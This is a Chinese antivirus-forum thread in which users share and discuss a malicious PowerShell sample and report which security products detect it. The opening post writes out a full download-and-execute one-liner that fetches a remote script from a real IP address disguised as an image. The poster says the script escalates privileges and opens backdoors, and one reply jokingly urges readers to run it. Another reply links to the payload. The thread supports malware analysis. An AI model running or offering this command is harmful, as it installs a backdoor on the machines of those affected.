查看: 1379|回复: 12
收起左侧

[病毒样本] 某恶意powershell脚本

[复制链接]
2893367145
发表于 2021-8-6 15:10:21 | 显示全部楼层 |阅读模式
逛论坛的时候得到的,各位大佬来分析分析?
(已知会利用漏洞提权,开SMB HTTP后门)
  1. <font size="4"><b>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://210.16.120.165:15672/57BC9B7E.Png');MsiMake "</b></font>
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
2893367145
 楼主| 发表于 2021-8-6 15:11:32 | 显示全部楼层
胆大的请务必直接执行
静影沉璧
发表于 2021-8-6 15:12:01 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
泉州晋江
头像被屏蔽
发表于 2021-8-6 15:15:30 | 显示全部楼层
过卡巴斯基
ANY.LNK
发表于 2021-8-6 15:19:42 | 显示全部楼层
总觉得有紫狐或匿影组织的感觉
Edge SmartScreen当前暂时不报告此威胁,已上报
两个powershell脚本Microsoft Defender下载+扫描当前暂时不报,已上报
a233
发表于 2021-8-6 15:31:45 | 显示全部楼层
Avast双击

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
swizzer
发表于 2021-8-6 15:35:06 | 显示全部楼层

swizzer
发表于 2021-8-6 15:51:42 | 显示全部楼层
本帖最后由 swizzer 于 2021-8-6 15:59 编辑

payload
https://funami.lanzoui.com/itoNtsauzcf

应为ps1文件··
aboringman
发表于 2021-8-6 15:53:41 | 显示全部楼层

PS1,吧

KSC:miss,无双击环境

评分

参与人数 1人气 +1 收起 理由
swizzer + 1 感谢解答: )

查看全部评分

swizzer
发表于 2021-8-6 15:58:30 | 显示全部楼层
aboringman 发表于 2021-8-6 15:53
PS1,吧

KSC:miss,无双击环境

virlib工具渐渐过时这几次都识别错了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 07:17 , Processed in 0.127653 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表